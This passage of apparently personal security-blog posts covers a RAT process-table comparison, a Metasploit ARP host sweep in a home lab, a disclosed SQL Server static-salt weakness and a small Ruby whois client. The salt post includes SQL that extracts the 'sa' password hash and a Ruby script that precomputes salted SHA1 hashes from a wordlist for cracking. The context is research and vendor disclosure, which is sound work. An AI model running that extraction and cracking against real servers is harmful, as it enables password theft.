352 mqsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqsvc.exe
832 mqtgsvc.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\mqtgsvc.exe
768 alg.exe x86 0 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
4032 sqlservr.exe x86 0 NT AUTHORITY\NETWORK SERVICE c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe
4052 inetinfo.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\inetsrv\inetinfo.exe
4044 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
3692 dllhost.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\dllhost.exe
3896 IEXPLORE.EXE x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Internet Explorer\IEXPLORE.EXE
2988 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\IEXPLORE.EXE
3364 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\iexplore.exe


If you can't see a difference between the 'infected' and 'not infected' states, it's because there's not much of one.
Here's the output from running the 'diff' command on the process tables:

 $ diff running notrunning
32,33c32
< 916 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\IEXPLORE.EXE
< 3448 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\iexplore.exe
---
> 3364 IEXPLORE.EXE x86 0 VIKTIM2\viktim C:\Program Files\Internet Explorer\iexplore.exe


As you can see, it's pretty tough to tell that this host is compromised just based on that.

You could see that it was compromised in the network traffic perhaps, as the RAT communicates with its control center. However, if a standard port was being used for the comms (say, TCP/80 for example) it could be difficult to tell even then without looking at the actual packets to examine the data.

Like I said, this wasn't really something I just figured out, it was just a very nice, clearly defined example of it.

04 March 2010

Finding Live Hosts on the Local Network Segment Using Metasploit

I've been learning ruby of late, and one way I'm doing that is by tearing into Metasploit. This has a few nice benefits for me:

* I get to see real code, written by smart people
* I get to learn metasploit a lot better
* I get to figure out how to write my own modules for metasploit

Since I've got a couple of arp flood/sweep scripts I've written in both perl and python, I figured that'd be a decent place to start.

It turns out that metasploit already has a module to do this (arp_sweep.rb), so I started by taking a look at it. At first, I thought it didn't do an active sweep, because it appeared to operate on a pcap file only. I tweeted a question to #metasploit about that, and was quickly informed by @hdmoore that the module does indeed work on the target network; I just needed to set the INTERFACE option.

At that point I realized I should probably stop relying on just the code, and start poking at things from within the console =)

First things first: the arp_sweep module relies on pcaprub. Because I'm using Ubuntu 9.10 (Karmic Koala) rather than something like Backtrack, this module was not already configured. I found a great post over at darkoperator.com which explained, among other things, how to get this working. Here are the steps I took:

From inside my metasploit svn trunk directory (~/src/svn/metasploit/framework3/trunk in my case), I ran the following:
   $ cd external/pcaprub
$ ruby extconf.rb && make
$ sudo make install


Note that you need to have the libpcap-dev package installed in order for pcaprub to compile.

Once that was done, I returned to the main trunk directory and ran msfconsole as root (that last bit is important: as far as I can tell, the arp sweep must be run as root on linux, because the module puts the interface into promiscuous mode to capture the ARP replies):

root:~/msf# ./msfconsole 

[msfconsole ASCII-art "metasploit" banner]


=[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 528 exploits - 248 auxiliary
+ -- --=[ 196 payloads - 23 encoders - 8 nops
=[ svn r8703 updated today (2010.03.03)


The next thing that happens when I load msfconsole is that a bunch of stuff I have set in my msfconsole.rc gets loaded. If you want more information on what that means, Mubix has a great introduction to metasploit rc files at his practical exploitation site. Here's what it looks like:

resource (/root/.msf3/msfconsole.rc)> color false
resource (/root/.msf3/msfconsole.rc)> setg RHOSTS 10.0.1.0/24
RHOSTS => 10.0.1.0/24
resource (/root/.msf3/msfconsole.rc)> setg RHOST 10.0.1.75
RHOST => 10.0.1.75
resource (/root/.msf3/msfconsole.rc)> setg LHOST 10.0.1.51
LHOST => 10.0.1.51


The LHOST setting reflects the IP address of my testing host, the RHOST setting is a victim host I have on my network specifically to attack, and the RHOSTS is my lab network. The color false is there for a few reasons, one of them being that I like transparent term windows and color text sometimes doesn't play well with that.

The next step is to load the arp_sweep module and check out what options it takes. The module is in the auxiliary tree within metasploit, and can be loaded like so:

msf > use auxiliary/scanner/discovery/arp_sweep
msf auxiliary(arp_sweep) > show options

Module options:

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   INTERFACE                   no        The name of the interface
   PCAPFILE                    no        The name of the PCAP capture file to process
   RHOSTS     10.0.1.0/24      yes       The target address range or CIDR identifier
   SHOST                       yes       Source IP Address
   SMAC                        yes       Source MAC Address
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    500              yes       The number of seconds to wait for new data


You can see here some of the effects of the resource file that was loaded earlier: the RHOSTS option is already set for me. I still need to set a couple of other things to make this work, namely the source IP address and MAC, as well as the aforementioned INTERFACE setting:

msf auxiliary(arp_sweep) > set SHOST 10.0.1.51
SHOST => 10.0.1.51
msf auxiliary(arp_sweep) > set INTERFACE wlan0
INTERFACE => wlan0


To set the SMAC option, I need to find the MAC address of my network adapter. Because I'm using wireless for my testing, I need to grab that information from the wlan0 interface. Fortunately, ifconfig provides this information. Even more fortunately, metasploit allows system commands to be run from within the console, so I can get it quite easily:
msf auxiliary(arp_sweep) > ifconfig wlan0
[*] exec: ifconfig wlan0

wlan0 Link encap:Ethernet HWaddr 00:1b:77:df:e9:ae
inet addr:10.0.1.51 Bcast:10.0.1.255 Mask:255.255.255.0
inet6 addr: fe80::21b:77ff:fedf:e9ae/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8229414 errors:0 dropped:0 overruns:0 frame:0
TX packets:12543574 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:2582588276 (2.5 GB) TX bytes:797473527 (797.4 MB)


Now that I have the MAC address (it's presented in the HWaddr string above), I can set the last option:

msf auxiliary(arp_sweep) > set SMAC 00:1b:77:df:e9:ae
SMAC => 00:1b:77:df:e9:ae


One more thing to change; I like to increase the thread count to keep things moving quickly:
msf auxiliary(arp_sweep) > set THREADS 20
THREADS => 20


Now I run show options once more to make sure the changes I made look right:
msf auxiliary(arp_sweep) > show options

Module options:

   Name       Current Setting    Required  Description
   ----       ---------------    --------  -----------
   INTERFACE  wlan0              no        The name of the interface
   PCAPFILE                      no        The name of the PCAP capture file to process
   RHOSTS     10.0.1.0/24        yes       The target address range or CIDR identifier
   SHOST      10.0.1.51          yes       Source IP Address
   SMAC       00:1b:77:df:e9:ae  yes       Source MAC Address
   THREADS    20                 yes       The number of concurrent threads
   TIMEOUT    500                yes       The number of seconds to wait for new data


And then I can run the module:
msf auxiliary(arp_sweep) > run

[*] 10.0.1.1 appears to be up.
[*] 10.0.1.2 appears to be up.
[*] 10.0.1.5 appears to be up.
[*] 10.0.1.18 appears to be up.
[*] 10.0.1.49 appears to be up.
[*] 10.0.1.50 appears to be up.
[*] 10.0.1.75 appears to be up.
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed


Excellent! I got a nice list of live hosts on the local network segment using ARP.

I'll talk about why this is useful (over something like tcp portscanning the local network) in a blog post soon.

[edit]
I should mention by the way: if you wanted to do this outside of metasploit, you could do something like the following:

$ for i in `seq 0 254`; do sudo arping -I wlan0 -c1 -f 10.0.1.$i; done |grep Unicast


The results aren't nearly as pretty (nor do they come back as quickly):
Unicast reply from 10.0.1.1 [00:0E:08:ED:A8:B1]  2.028ms
Unicast reply from 10.0.1.2 [00:15:62:FF:D6:06] 1.248ms
Unicast reply from 10.0.1.5 [00:20:00:38:20:6C] 2.548ms
Unicast reply from 10.0.1.18 [00:1D:73:A4:0A:AD] 1.182ms
Unicast reply from 10.0.1.49 [00:1F:3C:CD:50:1C] 1.652ms
Unicast reply from 10.0.1.50 [00:21:97:47:6C:80] 1.766ms
Unicast reply from 10.0.1.75 [00:02:55:42:08:0D] 1.203ms

02 March 2010

SQL Server 2005 (and 2008) Static Salt

While performing a database security review for a client, I noticed that the password hashes for the 'sa' user in the master.sys.sql_logins table all had the same salt. This was true on 4 separate SQL server instances across 4 different hosts.

Naturally, this piqued my curiosity, so I proceeded to investigate on as many SQL Server 2005 instances as I could get my hands on, and found that the salt was the same across the board.

To expound a bit:
If you run the following SQL statement:
SELECT password_hash FROM master.sys.sql_logins WHERE name = 'sa'

the whole password hash looks something like this:
0x01004086CEB6A06CF5E90B58D455C6795DFCE73A9C9570B31F21


The way that value breaks down is like so:
0x       : this is a hex value (the column is of type varbinary)
0100     : "throw away" constant bytes
4086CEB6 : the hash salt

The remainder of the value is the hashed password itself.
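A quick way to see the pieces outside of SQL (a throwaway Ruby sketch using the example value above):

# Split the varbinary value from sql_logins into its parts.
hash_hex = '01004086CEB6A06CF5E90B58D455C6795DFCE73A9C9570B31F21'
raw = [hash_hex].pack('H*')             # hex string -> raw bytes

header = raw[0, 2].unpack('H*').first   # "0100" constant
salt   = raw[2, 4].unpack('H*').first   # "4086ceb6"
digest = raw[6..-1].unpack('H*').first  # the hashed password portion

puts "header: #{header}"
puts "salt:   #{salt}"
puts "hash:   #{digest}"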

Since we're only interested in bytes 3 - 6, we can use the SQL SUBSTRING() function to pull the part we care about like so:
  SELECT SUBSTRING(password_hash,3,4) AS sa_hash_bytes
FROM master.sys.sql_logins WHERE name = 'sa';


On each SQL Server instance I tested, the salt was the same
(0x4086CEB6)

This was true across service packs, and across differing versions of both the DBMS platform and the OS.

Here's the output from 'SELECT @@version' on my test instances (minus the date and copyright):
Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
Express Edition on Windows NT 6.0 (Build 6001: Service Pack 1)

Microsoft SQL Server 2005 - 9.00.4053.00 (Intel X86)
Express Edition on Windows NT 5.1 (Build 2600: Service Pack 2)

Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86)
Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2)


I did some checking to see if this was a known issue, and was unable to find either an article or post describing it, or anyone in the industry who had heard about it.

While this isn't a "sexy" BoF or anything, it does leave SQL Server administrative passwords open to password cracking (e.g. by using a precomputed table of SHA1 hashes built with the static, known salt, one can dramatically decrease the time it takes to crack an sa password... on any SQL Server 2005 or 2008 instance). Additionally, once a password has been acquired, it may be possible to reuse that same password in other locations on a network if the administrators use a common password (or a common OS image for servers...).
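To make the precomputation idea concrete: my understanding is that the digest portion of the hash is SHA-1 over the UTF-16LE encoding of the password followed by the four salt bytes. Assuming that holds, a precomputation pass over a wordlist is only a few lines of Ruby (the wordlist file name and the ASCII-only encoding shortcut are assumptions of this sketch):

#!/usr/bin/env ruby
# Precompute candidate sa hashes using the static salt 0x4086CEB6.
# Assumes the digest is SHA1( UTF-16LE(password) + salt ), and that the
# candidate passwords are plain ASCII (the pack('v*') trick below only
# handles single-byte characters).
require 'digest/sha1'

SALT = ['4086CEB6'].pack('H*')   # the static salt, as raw bytes

File.foreach('wordlist.txt') do |line|          # hypothetical wordlist file
  password = line.chomp
  utf16le  = password.unpack('C*').pack('v*')   # naive ASCII -> UTF-16LE
  digest   = Digest::SHA1.hexdigest(utf16le + SALT)
  puts "#{password}:0100#{SALT.unpack('H*').first}#{digest}"
end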

The real risk this poses is fairly minor, since by default in the affected SQL Server versions normal users lack access to the column containing the password hash. However, there are a great many applications out there which use privileged accounts to access their database back end, and an even greater number which contain SQL injection vulnerabilities. In my mind, there's likely to be a fair amount of overlap between those two vectors, which would leave a system potentially exposed to exploitation through this method.

Accordingly, I decided to contact Microsoft. (I'll leave the discussion about Full Disclosure for some other post.) I have to say, working with the MSRC was pretty decent; they were quite competent and very forthcoming. Whatever else can be said about Microsoft, it's clear that they have come a long way in dealing with vulnerabilities, which I am very happy to report.

The end result of all this is a Microsoft KB Article that explains more about the issue, along with some workarounds. According to that article, this will be fixed in SQL Server service packs at some point.

For those that are curious, the entire process took less than 3 months (I first reported the issue to Microsoft on December 11, 2009.) In my opinion, that's an acceptable time frame for a large company to address what is an admittedly minor security issue, particularly given the fact that there are a number of major (and minor) holidays which take place in that time span.

01 March 2010

playing with ruby

i started playing around with ruby recently.
one of the first things i figured i'd do is muck about with sockets.
it turns out that's brain dead easy with ruby, which i was happy to discover.
here's a quick and dirty whois client i whipped up as a way to learn the syntax etc.

require "socket"

whoisrv = "whois.arin.net"
port    = 43
qry     = "208.105.198.137"

# open a TCP connection to the whois server, send the query,
# and print each line of the response as it comes back
s = TCPSocket.open(whoisrv, port)
s.puts(qry)
while line = s.gets
  puts line
end
s.close